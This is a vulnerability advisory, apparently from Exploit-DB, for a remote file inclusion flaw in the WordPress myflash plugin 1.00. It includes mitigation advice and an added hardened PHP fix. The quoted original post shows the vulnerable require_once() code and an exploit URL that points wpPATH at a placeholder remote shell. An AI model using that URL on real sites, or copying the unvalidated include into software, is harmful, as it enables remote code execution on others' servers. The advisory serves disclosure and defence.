Vendor: myflash plugin
By: Crackers_Child
CVSS: N/A
Tags: HIGH, RFI, CWE
Product Name: myflash plugin
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WordPress plugin myflash <= V1.00 (wppath) RFI Vulnerability

This exploit allows an attacker to include remote files on the target server by manipulating the wpPATH parameter of the myflash-button.php file in the myflash plugin for WordPress. Because the parameter is passed unchanged to require_once(), a specially crafted request lets the attacker execute arbitrary code on the target server.

Mitigation:

Update to the latest version of the myflash plugin, or remove it if it is not needed. Ensure that user input is validated and sanitized before it is used in any include or require statement.
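The following is an added example, not code from the myflash plugin or from the advisory author, showing how the include path should be derived so that the wpPATH parameter is no longer needed at all, plus a validator for installs that must accept a path. It assumes the plugin file keeps its standard location under wp-content/plugins/myflash/; the function names are hypothetical. Note that the remote variant of this bug also depends on the server's allow_url_fopen (and, from PHP 5.2 on, allow_url_include) setting, so disabling allow_url_include is a worthwhile server-side hardening step independent of the plugin fix.

```php
<?php
// Added example (not the plugin's own code). The vulnerable myflash-button.php
// takes wpPATH from $_GET/$_POST and uses it unchanged as the prefix of two
// require_once() calls, so a remote URL (with allow_url_fopen/allow_url_include
// on) or a local path of the attacker's choosing gets included and executed.
//
// Hardened approach: never build an include path from request input. The file
// lives at wp-content/plugins/myflash/myflash-button.php, so the WordPress root
// is three directories above it and can be located without any parameter.

function myflash_wp_root() {
    // realpath() collapses ../ segments and symlinks; false if it does not exist.
    $root = realpath(dirname(__FILE__) . '/../../..');
    if ($root === false || !is_file($root . '/wp-config.php')) {
        return false;
    }
    return $root;
}

// Only for non-standard layouts where a path must be accepted: reject anything
// carrying a stream scheme (http:, ftp:, php:, data:, ...), resolve the rest
// with realpath(), and accept it only if it sits under an allow-listed local
// directory and actually contains wp-config.php. Returns the safe path or false.
function myflash_validate_wp_path($candidate, array $allowed_roots) {
    if (!is_string($candidate) || preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return false;   // any "scheme:" prefix is refused outright
    }
    $resolved = realpath($candidate);
    if ($resolved === false || !is_file($resolved . '/wp-config.php')) {
        return false;
    }
    foreach ($allowed_roots as $base) {
        $base = rtrim((string) realpath($base), '/');
        // prefix check with a trailing slash so /var/www/wp2 is not matched by /var/www/wp
        if ($base !== '' && strpos($resolved . '/', $base . '/') === 0) {
            return $resolved;
        }
    }
    return false;
}

// Default path: derive the root from the file location, fail closed otherwise.
$wp_root = myflash_wp_root();
if ($wp_root === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('myflash: cannot locate the WordPress installation');
}
require_once($wp_root . '/wp-config.php');
require_once($wp_root . '/wp-admin/admin.php');
global $wpdb;
```

The validator is deliberately separate so that the default code path contains no request-controlled value at all; use it only when a hard-coded allow-list of installation directories is genuinely required.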
Source (Exploit-DB raw data):

--------------------------------- [ What a treacherous world! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: cybermilitan@hotmail.com

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Application :  Wordpress plugin

Web Site    :  http://alexrabe.boelinger.com/

--------------------------------------------------------------------------------
Vuln in myflash-button.php

// wpPATH is read straight from the request, with no validation ...
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

// ... and used unchanged as the prefix of two require_once() paths.
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/[path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------

greets:

Every Body

--------------------------------------------------------------------------------



--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

# milw0rm.com [2007-05-01]